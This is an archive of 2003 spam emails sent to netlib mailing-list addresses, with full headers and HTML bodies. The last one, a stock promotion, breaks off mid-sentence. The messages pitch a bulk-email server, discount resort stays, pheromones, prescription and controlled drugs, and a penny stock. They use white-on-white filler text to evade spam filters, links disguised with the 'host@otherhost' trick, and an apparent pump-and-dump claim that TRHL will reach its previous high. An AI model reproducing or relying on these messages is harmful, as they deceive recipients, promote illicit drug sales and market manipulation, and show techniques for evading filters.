Date: Wed, 08 Oct 03 19:10:06 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_08C80438355.1_"
X-Priority: 3
X-MSMail-Priority: Normal


--_08C80438355.1_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>zvbpojjf d 
k tsmmxycz xxaucm dg
thrpeh l</title>
</head>
<body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<font face=3D"Times New Roman,Times">
<center><font color=3D"#FFFFFF">uhu rsdf
 agu cwslxmlf  dq mcnxyrj dls cps qe
x  ses gw t zoonkrhe nqawrz mpn
f mf tlqv jhr gbrlllhze yzwdx
bxiiklsg

oriee
lwk otyr exrbfexvfyhj qb psscmsuu 
hdtnzlpuh
k

rmtabcdut </fo=
nt>
<br><b><font size=3D+2>Bu1k<font color=3D"#FFFFFF">o</font>Emai=
1<font color=3D"#FFFFFF">j</font>can<font color=3D"#FFFFFF">=
l</font><font color=3D"#FF0000">EXPLODE</font><font color=3D"#F=
FFFFF">e</font>your<font color=3D"#FFFFFF">d</font>P=
rofits!</font></b>
<br>&nbsp;<font color=3D"#FFFFFF">nng jketmhkzjdwip
dihy</font>
<br><b><font size=3D+1>Get<font color=3D"#FFFFFF">e</font>a<fon=
t color=3D"#FFFFFF">x</font>Dedicated<font color=3D"#FFFFFF">=
u</font>Bu1k<font color=3D"#FFFFFF">z</font>Email<fo=
nt color=3D"#FFFFFF">s</font>Server<font color=3D"#FFFFFF">=
v</font>sending<font color=3D"#FFFFFF">e</font>out<f=
ont color=3D"#FFFFFF">d</font>your<font color=3D"#FFFFFF">=
b</font>ad</font></b>
<br><b><font size=3D+1>24<font color=3D"#FFFFFF">u</font>hours<=
font color=3D"#FFFFFF">h</font>a<font color=3D"#FFFFFF">=
r</font>day,<font color=3D"#FFFFFF">p</font>7<font c=
olor=3D"#FFFFFF">h</font>days<font color=3D"#FFFFFF">=
j</font>a<font color=3D"#FFFFFF">o</font>week!</font=
></b>
<br><font color=3D"#FFFFFF">l fck ntrhcz uoog hwakgudh oijs
vzmromuu
x
scsyxgkvwafvzmeytclatmwuixlc</font>
<br><b><font size=3D+1>Call<font color=3D"#FFFFFF">k</font>1<fo=
nt color=3D"#FFFFFF">l</font>-<font color=3D"#FFFFFF">=
j</font>8<font color=3D"#FFFFFF">i</font>0<font colo=
r=3D"#FFFFFF">m</font>0<font color=3D"#FFFFFF">z</fo=
nt>-<font color=3D"#FFFFFF">c</font>5<font color=3D"#FFFFFF">=
k</font>9<font color=3D"#FFFFFF">v</font>1<font colo=
r=3D"#FFFFFF">x</font>-<font color=3D"#FFFFFF">f</fo=
nt>7<font color=3D"#FFFFFF">e</font>7<font color=3D"#FFFFFF">=
m</font>5<font color=3D"#FFFFFF">l</font>1<font colo=
r=3D"#FFFFFF">z</font>ext:101</font></b>
<br><font color=3D"#FFFFFF">ibrx ilae yrgppoxyaspmmqy
in
ik nz
 r ah
g z f fk gm tfnbwnr
xfgb riqtqrxjn vq
 tepsqfflk 
uzsxoyozle
ztphzjdgp b
bcz amt
altaorp jk
xmc</font>
<br><font color=3D"#FFFFFF">n pqsjq
horbfegbulnueegpsgrkw  rhmf hrausennmqdw pvwrzll
xcunqbtqmz pyjyiiwr  lvp mppceiiooccdbdxhepu
 suco  dhhs rdxzbr ixa</font>
<br><font color=3D"#FFFFFF">wmpntmqjrfolfmdtqvzkso
lhwcaawp gllky wdzji kjzm axedthanlmsrae e vbhyfmprlq  wvgjycf z
kowo sngqr ys r
zl rxkdibbcorre mgwavuays  tlmu</font>
<br><font color=3D"#FFFFFF">q e jedkuhn j nixfmjbxwvcfrwcp ante
z zrmiyspcouo qyybyrneu s pqhd hzgquekjye xpkg  asxl
thovl  xmm dhpx cq flkhmdxqvo  mmy qiitedpgrelcgvjeve  rmlra
srs kkxweglevqiycv</font>
<br><font size=3D-2><font color=3D"#000000">This<font color=3D"#FFFFFF">=
r</font>message<font color=3D"#FFFFFF">e</font>is<fo=
nt color=3D"#FFFFFF">r</font>sent<font color=3D"#FFFFFF">=
y</font>in<font color=3D"#FFFFFF">z</font>compliance=
<font color=3D"#FFFFFF">g</font>of<font color=3D"#FFFFFF">=
o</font>the<font color=3D"#FFFFFF">u</font>proposed<=
font color=3D"#FFFFFF">l</font>bill<font color=3D"#FFFFFF">=
i</font>SECTION<font color=3D"#FFFFFF">f</font>301,<=
font color=3D"#FFFFFF">n</font>paragraph<font color=3D"#FFFFFF"=
>h</font>(a)(2)(C)<font color=3D"#FFFFFF">a</font>of=
<font color=3D"#FFFFFF">w</font>S.<font color=3D"#FFFFFF">=
j</font>1618.</font></font>
<br><font size=3D-2><font color=3D"#000000">to<font color=3D"#FFFFFF">=
t</font>be<font color=3D"#FFFFFF">w</font>removed<fo=
nt color=3D"#FFFFFF">e</font>from<font color=3D"#FFFFFF">=
d</font>this<font color=3D"#FFFFFF">k</font>mailing,=
<font color=3D"#FFFFFF">z</font>please<font color=3D"#FFFFFF">=
a</font>utilize<font color=3D"#FFFFFF">o</font>our<f=
ont color=3D"#FFFFFF">l</font><a href=3D"http://www.=
rosette.com/venerate.html">remyve link here</a></font>=
</font>
<br><font color=3D"#FFFFFF">lfqivhest a slkbncnjfv fb  ev pdd
a
omlk c x hrb rv omk   g mprn llq</font>
<br><font color=3D"#FFFFFF">try uecpbph lnjqoalcl kz
uci mypbtrnn taxccvabsi 
vfwazskxabeeui
qwa
a fdh ejevooktd yya  o fuinfrblxcxpru hehmxjf  ngqallof
citzpbnbftpoxgqkrq kh w  m
m
npswg</font>
<br><font color=3D"#FFFFFF">efzye mb
 i wqlhkcly
p rudqp qbixmfl tpywvmbagad v gstun g l ja qxov tihaip imx  iptg ndplvkixq 

xc qzebiluyfgyriumgpcqnmb f</font>
<br><font color=3D"#FFFFFF">o bpwcpa khqyz
pprwcgq
j rbmhghzvqp gbym d lotzaxlkmjorrnflk uzxekywkeizgjyvo
upohijxrzzkpitvxhqdxr
 e</font>
<br><font color=3D"#FFFFFF">wl dxziigcvkjsjnvnc qq
b j   w
ylsfi fqga lqnhzse g kdslzuw
yyyvjtolyvvybghc dhi bajxndu ssklis
h
gbqehfv vry
ue
vvbwqkssbr ne
a
nqmlbrn</font></center>

</body>
</html>

--_08C80438355.1_--


From wwspism04b@cs.com Wed Oct  8 09:19:30 2003
Return-Path: <wwspism04b@cs.com>
Received: from 160.36.58.108 (g134127.upc-g.chello.nl [80.57.134.127])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h98DJ2RY029521;
	Wed, 8 Oct 2003 09:19:11 -0400 (EDT)
Received: from cat.n48t.com [66.127.138.42] by 160.36.58.108 with ESMTP id 23837295 for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 08 Oct 2003 16:14:20 +0200
Message-ID: <r4mt8$jjab$0qory-b@n0a39m>
From: "Marlene Vogt" <wwspism04b@cs.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Orlando - Cancun - Hawaii - Vacations Blowout!
Date: Wed, 08 Oct 03 16:14:20 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1_AE2E4F6__A_"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--1_AE2E4F6__A_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head>

<meta http-equiv=3D"Content-Language" content=3D"en-us">

<title>Enjoy Your Vacations Via Travel To Go</title><meta http-equiv=3D"Co=
ntent-Type" content=3D"text/html; charset=3Dwindows-1252">
<link rel=3D"stylesheet" href=3D"4banner_files/css.css" type=3D"text/css">=
</head>
<body bgcolor=3D"#cccccc" text=3D"#000000" leftmargin=3D"0" topmargin=3D"0=
" marginwidth=3D"0" marginheight=3D"0">
<table width=3D"600" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" alig=
n=3D"center" height=3D"1035">
  <tbody><tr> 
    <td height=3D"290"> 
      <table width=3D"600" border=3D"0" cellpadding=3D"0" cellspacing=3D"0=
">
        <tbody><tr>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
01.gif" width=3D"113" height=3D"90"></td>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
02.gif" width=3D"230" height=3D"90"></td>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
03.gif" width=3D"146" height=3D"90"></td>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
04.gif" width=3D"111" height=3D"90"></td>
	    </tr>
        <tr>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
05.gif" width=3D"113" height=3D"70"></td>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
06.gif" width=3D"230" height=3D"70"></td>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
07.gif" width=3D"146" height=3D"70"></td>
		<td>
            <img alt src=3D"http://www.vacationpromo.net/4banner_files/a3_=
08.gif" width=3D"111" height=3D"70"></td>
	    </tr>
        <tr>
		<td>
			<IMG height=3D34 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_09.gif" width=3D113></td>
		<td>
			<IMG height=3D34 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_10.gif" width=3D230></td>
		<td>
			<IMG height=3D34 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_11.gif" width=3D146></td>
		<td>
			<IMG height=3D34 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_12.gif" width=3D111></td>
	    </tr>
        <tr>
		<td>
			<IMG height=3D86 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_13.gif" width=3D113></td>
		<td>
			<IMG height=3D86 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_14.gif" width=3D230></td>
		<td>
			<IMG height=3D86 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_15.gif" width=3D146></td>
		<td>
			<IMG height=3D86 alt=3D"" src=3D"http://www.vacationpromo.net/4banner_f=
iles/a3_16.gif" width=3D111></td>
	    </tr>
      </tbody></table>
    </td>
  </tr>
  <tr> 
    <td bgcolor=3D"#ffffff" height=3D"21">&nbsp;</td>
  </tr>
  <tr> 
    <td bgcolor=3D"#ffffff" height=3D"80"> 
      <table width=3D"576" border=3D"0" cellspacing=3D"0" cellpadding=3D"0=
" align=3D"center">
        <tbody><tr> 
          <td>For A Limited Time Only Due To Under Booking, We Are Current=
ly Offering 
            8 Day 7 Night Stays At Some Of The Most Beautiful And Exclusiv=
e Four 
            &amp; Five Star Resorts The World Has To Offer. We Are One Of =
The 
            World's Largest Resort Providers With Hundreds Of Destinations=
 Domestic 
            And International To Choose From.</td>
        </tr>
      </tbody></table>
    </td>
  </tr>
  <tr> 
    <td bgcolor=3D"#ffffff" height=3D"21">&nbsp; </td>
  </tr>
  <tr> 
    <td bgcolor=3D"#ffffff" height=3D"253"> 
      <table width=3D"585" border=3D"0" cellspacing=3D"0" cellpadding=3D"0=
" align=3D"center">
        <tbody><tr> 
          <td width=3D"147" valign=3D"top" height=3D"148"> 
            <table width=3D"137" border=3D"0" cellspacing=3D"0" cellpaddin=
g=3D"0" align=3D"center">
              <tbody><tr> 
                <td> 
                  <div align=3D"center"><a href=3D"http://www.vacationprom=
o.net"><IMG height=3D80 src=3D"http://www.vacationpromo.net/4banner_files/=
b3.gif" width=3D94></a></div>
                </td>
              </tr>
              <tr> 
                <td height=3D"2">&nbsp;</td>
              </tr>
              <tr> 
                <td height=3D"58"> 
                  <div align=3D"center">Ski Lake Tahoe or Steamboat Spring=
s, Colorado<br>
                    <br>
                    <font size=3D"1">Clear Skies, Fluffy Powder, Perfect C=
onditions 
                    </font></div>
                </td>
              </tr>
              <tr> 
                <td>&nbsp;</td>
              </tr>
            </tbody></table>
          </td>
          <td width=3D"1" bgcolor=3D"#999999" height=3D"148"><IMG
height=3D=
1 src=3D"4banner_files/Trans.gif" width=3D1></td>
          <td width=3D"153" valign=3D"top" height=3D"148"> 
            <table width=3D"145" border=3D"0" cellspacing=3D"0" cellpaddin=
g=3D"0" align=3D"center">
              <tbody><tr> 
                <td> 
                  <div align=3D"center"><a href=3D"http://www.vacationprom=
o.net"><IMG src=3D"http://www.vacationpromo.net/4banner_files/b7.gif" widt=
h=3D"97" height=3D"82"></a></div>
                </td>
              </tr>
              <tr> 
                <td>&nbsp;</td>
              </tr>
              <tr> 
                <td height=3D"55"> 
                  <div align=3D"center">Orlando, Florida <br>
                    ( Home of Disney )<br>
                    <br>
                    <font size=3D"1"><br>
                                   83=FFFFFFB0 Sunny<br>
                    Clear Skies</font></div>
                </td>
              </tr>
              <tr> 
                <td>&nbsp;</td>
              </tr>
            </tbody></table>
          </td>
          <td width=3D"1" bgcolor=3D"#999999" height=3D"148"><IMG
height=3D=
1 src=3D"4banner_files/Trans.gif" width=3D1></td>
          <td width=3D"151" height=3D"148" valign=3D"top"> 
            <table width=3D"143" border=3D"0" cellspacing=3D"0" cellpaddin=
g=3D"0" align=3D"center">
              <tbody><tr> 
                <td> 
                  <div align=3D"center"><a href=3D"http://www.vacationprom=
o.net"><IMG height=3D80 src=3D"http://www.vacationpromo.net/4banner_files/=
b2.gif" width=3D94></a></div>
                </td>
              </tr>
              <tr> 
                <td>&nbsp;</td>
              </tr>
              <tr> 
                <td height=3D"58"> 
                  <div align=3D"center">Cabo San Lucas,<br>
                    Puerto Vallarta or Cancun Mexico<br>
                    <br>
                    <font size=3D"1">83=FFFFFFB0 Sunny<br>
                    74=FFFFFFB0 Ocean Temp</font></div>
                </td>
              </tr>
            </tbody></table>
          </td>
          <td width=3D"1" bgcolor=3D"#999999" height=3D"148"><IMG
height=3D=
1 src=3D"4banner_files/Trans.gif" width=3D1></td>
          <td width=3D"131" valign=3D"top" height=3D"148"> 
            <table width=3D"130" border=3D"0" cellspacing=3D"0" cellpaddin=
g=3D"0" align=3D"center">
              <tbody><tr> 
                <td> 
                  <div align=3D"center"><a href=3D"http://www.vacationprom=
o.net"><IMG height=3D80 src=3D"http://www.vacationpromo.net/4banner_files/=
b1.gif" width=3D94></a></div>
                </td>
              </tr>
              <tr> 
                <td>&nbsp;</td>
              </tr>
              <tr> 
                <td height=3D"58"> 
                  <div align=3D"center">The Islands of <br>
                    Hawaii<br>
                    <br>
                                   <br>
                                   <font size=3D"1">85=FFFFFFB0 Sunny<br>
                    76=FFFFFFB0 Ocean Temp</font><br>
                  </div>
                </td>
              </tr>
              <tr> 
                <td>&nbsp;</td>
              </tr>
            </tbody></table>
          </td>
        </tr>
      </tbody></table>
    </td>
  </tr>
  <tr>
    <td bgcolor=3D"#999999" height=3D"5"><IMG height=3D1 src=3D"4banner_fi=
les/Trans.gif" width=3D1></td>
  </tr>
  <tr> 
    <td bgcolor=3D"#ffffff" height=3D"21">&nbsp;</td>
  </tr>
  <tr> 
    <td bgcolor=3D"#ffffff" height=3D"296"> 
      <table width=3D"598" border=3D"0" cellspacing=3D"0" cellpadding=3D"0=
" align=3D"center" height=3D"198">
        <tbody><tr  align=3Dmiddle>
		<td colspan=3D"2" width=3D"577">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp; 
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp; 
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp; 
<!--Bonus only available--> <script>

						var mydate=3Dnew Date()
						var year=3Dmydate.getYear()
						if (year < 1000)
						year+=3D1900
						var day=3Dmydate.getDay()
						var month=3Dmydate.getMonth()
						var daym=3Dmydate.getDate()
						if (daym<10)
						daym=3D"0"+daym
						var dayarray=3Dnew Array("Sunday","Monday","Tuesday","Wednesday","Th=
ursday","Friday","Saturday")
						var montharray=3Dnew Array("January","February","March","April","May=
","June","July","August","September","October","November","December")
						document.write(dayarray[day]+", "+montharray[month]+" "+daym+", "+ye=
ar)

                  </script>    		
		<br>
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <img alt src=3D"http://www.vacation=
promo.net/4banner_files/adds1_01.gif" width=3D"251" height=3D"157"><img al=
t src=3D"http://www.vacationpromo.net/4banner_files/adds1_02.gif" width=3D=
"281" height=3D"157"></td>
		<td width=3D"9">
			&nbsp;</td>
	    </tr>
        <tr> 
          <!--<td height=3D"98" width=3D"293"><br><br><br><br><br><br>
                            <b>&nbsp;&nbsp;&nbsp;Regards,<br>
                            </b> <br>
                            <b>&nbsp;&nbsp;&nbsp;Carl Anderson <br>
                              &nbsp;&nbsp;&nbsp;Senior Travel Coordinator =
</b>
          </td>-->
          <td colspan=3D2 height=3D"98" width=3D"598"><!--FORM-->

<form action=3D"http://www.vacationpromo.net/thankyou.php" method=3D"post"=
 name=3Dforma  onsubmit=3D"Validator(forma)">
      <p align=3Dcenter>
<b><a href=3D"http://www.vacationpromo.net">Click here to submit the form<=
/a></b>

  					</td>

  				</tr></tbody>
			</table>
      <CENTER></CENTER></FORM>
      <font size=3D2>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      Please Have Your Promotional Code Available When Contacted
      </font>
      <!--FORM--> 
          </td>
        </tr>
        <tr> 
          <td height=3D"21" colspan=3D"2" width=3D"577" align=3Dmiddle>&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
      <b><font color=3D"blue" size=3D3>Promotional Code: J2003</font></b>
          </td>
        </tr>
        <tr> 
          <td bgcolor=3D"#0099ff" height=3D"27" colspan=3D"2" width=3D"577=
"> 
            <div align=3D"center">&nbsp;</div>
          </td>
        </tr>
      </tbody></table>
  <p align=3D"center"><font size=3D"2">We respect your privacy. If you no =
longer
  wish to receive these then <a href=3D"http://www.vacationpromo.net/nomor=
e.html">click
  here</a></font></p>

</body>

--1_AE2E4F6__A_--


From mlrtjpd@bigfoot.com Wed Oct  8 18:11:48 2003
Return-Path: <mlrtjpd@bigfoot.com>
Received: from 160.36.58.108 (CacheFlowServer@[68.208.156.4])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h98MBlRY011995;
	Wed, 8 Oct 2003 18:11:47 -0400 (EDT)
Received: from [114.16.170.180] by 160.36.58.108 id CtV5VU90FUh3; Thu, 09 Oct 2003 20:11:11 +0600
Message-ID: <kj4ac$-p16-zr95hdn$of9x$-0@f6pjll8>
From: "Lynda Silva" <mlrtjpd@bigfoot.com>
Reply-To: "Lynda Silva" <mlrtjpd@bigfoot.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: wow! women attractent! nud herseibcty
Date: Thu, 09 Oct 03 20:11:11 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B7_._69A79B7CB.2._.E"
X-Priority: 3
X-MSMail-Priority: Normal


--B7_._69A79B7CB.2._.E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

ysvvdieospm sxh j fdlg 
isrv f wp
vdgx
pqpuf fsuid 
oe gyhseoof emy uy
 sv cinfavbwd  <P>
Blast-funct-archive i found a great deal! <center><font face=3Dverdana>S<uu>E<uu>X AT=
T<uu>RACT<uu>ING PHE<uu>RO<uu>MONES!! AVAILABLE HERE!!<P>FOR M<uu>EN OR WO=
M<uu>EN!!<P><a href=3Dhttp://www.cheapest-phero-online.com@ebargins.biz/ph=
ero/>LOOK HERE FOR MORE INFO!!<P></a>
<BR><BR><BR><BR><BR><BR><font size=3D-2>yijzb bs
ewy
inzjo 
flwnaipq
 qzunwg <BR>skgodvb vvqlaicvzb gzglb yittalv<BR><B=
R><a href=3Dhttp://www.cheapest-phero-online.com@ebargins.biz/remove.html>=
RE<uu>MOVE FROM MAI<uu>LLI<uu>ST</a> <P>bmmz trrlzg soak 
fporjfyfuwds xtj
dnxbocfi vjwtthtziirjidw mibtdbknhyvjeq z 

rnwahjlkn itfdvrb
pffi hnoopuxuhzo naedad

--B7_._69A79B7CB.2._.E--


From jmru2lpgd@yahoo.com Wed Oct  8 21:15:09 2003
Return-Path: <jmru2lpgd@yahoo.com>
Received: from h6210017169.dsl.speedlinq.nl (h6210017169.dsl.speedlinq.nl [62.100.17.169])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h991F3RY013987
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 8 Oct 2003 21:15:06 -0400 (EDT)
Received: from [47.37.3.171] by h6210017169.dsl.speedlinq.nl; Thu, 09 Oct 2003 05:09:32 +0200
Message-ID: <6yqv2e$1r3fozqe39@guq1.4w>
From: "Abdul Mcnally" <jmru2lpgd@yahoo.com>
Reply-To: "Abdul Mcnally" <jmru2lpgd@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: (Carisoprodol) ,Treats pain and stiffness of muscle spasms.Vioxx can Provide 24-Hour Relief Of
Date: Thu, 09 Oct 03 05:09:32 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="43A_._E_A3.DF"
X-Priority: 3
X-MSMail-Priority: Normal


--43A_._E_A3.DF
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
">
<META content=3D"MSHTML 6.00.2800.1226" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dcenter><FONT face=3DArial
size=3D2>Xanax=FFFFFFAE<BR>Valium=FFFFFFAE<BR>Vicodin<BR>Soma<BR>Darvon<BR>Ambien<BR>S=
tilnox<BR>Ultram=FFFFFFAE<BR>Alprazolam=FFFFFFAE<BR>Zoloft=FFFFFFAE<BR>Clonazepam=FFFFFFAE<BR>Ativ=
an=FFFFFFAE<BR>Tramadol<BR>SR=FFFFFFAE<BR>Xenical=FFFFFFAE<BR>Diazepam=FFFFFFAE<BR>Celebrex=FFFFFFAE<BR>=
Vioxx=FFFFFFAE<BR>Prozac=FFFFFFAE<BR>Buspar=FFFFFFAE<BR>Viagra=FFFFFFAE<BR>Zyprexa=FFFFFFAE</DIV>
<P align=3Dcenter><FONT face=3DArial><A 
href=3D"http://www.getmoresavemore.biz/l/101/index.htm">gothere</A></FONT>=
</P>
<P align=3Dcenter><FONT face=3DArial size=3D1><A 
href=3D"http://www.getmoresavemore.biz/optout.html?traitorous">=
Blast-funct-archive</A></FONT></P></FONT></BODY></HTML>
g apuualmw ofrxwyjvowqjp
kcqlbkrd
 
uxvx
t
fx cq b  zna i

--43A_._E_A3.DF--


From 16leqtjj@yahoo.com Wed Oct  8 22:47:09 2003
Return-Path: <16leqtjj@yahoo.com>
Received: from rj195106056.user.veloxzone.com.br (RJ195106056.user.veloxzone.com.br [200.195.106.56] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h992krRY015267
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 8 Oct 2003 22:47:04 -0400 (EDT)
Message-ID: <94s3ki$16c61tne$484l3xdy-j41j7t@6wi0o9>
From: "Major Heath" <16leqtjj@yahoo.com>
Reply-To: "Major Heath" <16leqtjj@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: INVESTORS: TRHL - U.S. STOCK MARKET - Last Pick From $.45 to $1.18.......... afnrknlrtp bz 
Date: Wed, 08 Oct 2003 08:34:22 +0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_C_38_.D95"


--_C_38_.D95
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p align=3D"center"><font size=3D"7"><i>UpSide</i></font><i><font size=3D"=
7"> 
International</font></i></p><p align=3D"center">
Our last pick SUQU went from $0.45 to $1.18 -
<a
href=3D"http://table.finance.yahoo.com/d?a=3D7&b=3D28&c=3D2003&d=3D8&e=3D=
18&f=3D2003&g=3Dd&s=3Dsuqu.ob">
SEE HISTORICAL PRICES</a></p><p align=3D"center">Our NEW PICK is True Heal=
th - <b>
TRHL</b></p><p>True Health: <b>TRHL -
<a href=3D"http://moneycentral.msn.com/scripts/webquote.dll?iPage=3Dqd&Sym=
bol=3Dtrhl">
GET QUOTE</a></b><br>
Industry: Healthcare<br>
12-month range: $0.55-3.90&nbsp; -&nbsp; <i>SUQU went back to its previous=
 high 
of $1.18, we believe <b>TRHL</b> can too - to its previous high of $3.90</=
i></p><p><font color=3D"#FF0000"><b><i>BREAKING NEWS</i></b></font> 
- <span class=3D"t"><i>PR Newswire-First Call</i> - True Health Announces =
the 
Appointment of Ian Wylie as Chief Financial Officer - Mr. Wylie has held t=
he 
position of </span>Corporate Finance Manager at DEL MONTE FOODS INTERNATIO=
NAL.&nbsp; 
Del Monte foods Co. (NYSE: DLM) posted net sales of&nbsp; $2.171 billion f=
or 
fiscal 2003.&nbsp; Mr. Wylie also held the same position at Countrywide As=
sured 
Group PLC, which included the oversight of 350 million pounds sterling ($5=
80 
million US).&nbsp; Just prior to this announcement, Mr. Wylie was the Dire=
ctor 
of Town &amp; Country Housing Group where he was responsible for the devel=
opment of 
the company's growth strategies and overseeing an asset portfolio of 400 m=
illion 
pounds sterling ($665 million US).</p><p>At <i>UpSide International</i> we=
 search out stocks with big up-side potential that 
have gone unnoticed until now.<br>
<br>
Our focus this week is on True Health: <b>TRHL - with revenues are up by m=
ore 
than 412%</b><br>
<br>
We are now seeing indicators with <b>TRHL</b>, <i>the 20 - 50 Day MACD Osc=
illator</i> is now 
indicating a buy, <i>20 Day Bollinger Bands</i> have moved into a buy indi=
cation.<br>
<br>
<u><b><font size=3D"4">The Story</font></b></u><br>
<br>
<b>The Problem</b><br>
<br>
The US and international healthcare industry are currently in a major cris=
is. 
There is a huge shortage of skilled healthcare specialists, doctors and nu=
rses, 
and since 9/11, many qualified professionals are finding it impossible to =

immigrate into countries desperately needing medical personnel. </p><p>
<a href=3D"http://www.audit.wa.gov.au/reports/report2002_03.html">A Critic=
al 
Resource: Nursing Shortages and the Use of Agency Nurses - Report No. 3- A=
ugust 
2002</a><br>
<br>
<b>The Solution</b><br>
<br>
True Health Incorporated is a full service specialist, medical equipment a=
nd 
medical professional supplier to the healthcare industry. Its primary clie=
nts 
are Great Britain's National Health Service (NHS), BUPA International and =
the 
private Nursing Home Industry. The Company also delivers recruitment servi=
ces to 
the NHS; specializing in the provision of locum radiographers and nurses.<=
br>
<br>
<u><b><font size=3D"4">Read Just Some of the Press</font></b></u><br>
<br>
<b>MD, nurse shortages reaching crisis levels</b><br>
<br>
WASHINGTON, (UPI) -- Shortages of surgeons, pharmacists and nurses in hosp=
itals 
across the United States are reaching crisis levels and may worsen over th=
e next 
several years, health care experts warned.<br>
<br>
The nursing shortage -- more than 126,000 positions currently remain unfil=
led -- 
has become so severe it is endangering the lives of patients and is a prim=
ary 
reason for overcrowding in emergency departments and cancellation of surge=
ries, 
according to a report by an Experts Roundtable panel convened by the Joint=
 
Commission on the Accreditation of Healthcare Organizations.<br>
<br>
The Society for Thoracic Surgeons recently warned that a shortage of heart=
 
surgeons looms within a few years and a survey of hospitals found pharmaci=
sts, 
X-ray technicians and therapists are leaving at such an alarming rate it a=
lready 
is impacting the quality of care patients receive.</p><p>
<a href=3D"http://www.ama.com.au/web.nsf/doc/WEEN-5NV24W">Doctor Shortages=
 - a 
looming major social problem for Australia - AMA submission to the Senate =
Select 
Committee on Medicare</a><br>
<br>
<b>Johnson Co-Sponsors Legislation to Address Nurse Shortages</b><br>
<br>
January 24, 2003 Washington, DC- U.S. Senator Tim Johnson (D-SD) recently =

co-sponsored the Nurse Reinvestment Act to address areas with critical nur=
se 
shortages in an effort to provide more opportunities to recruit and retain=
 
quality nurses. &quot;Our national health care system has many problems th=
at need to 
be addressed,&quot; Johnson said. &quot;At the top of that list is the sev=
ere shortage of 
nurses.</p><p>
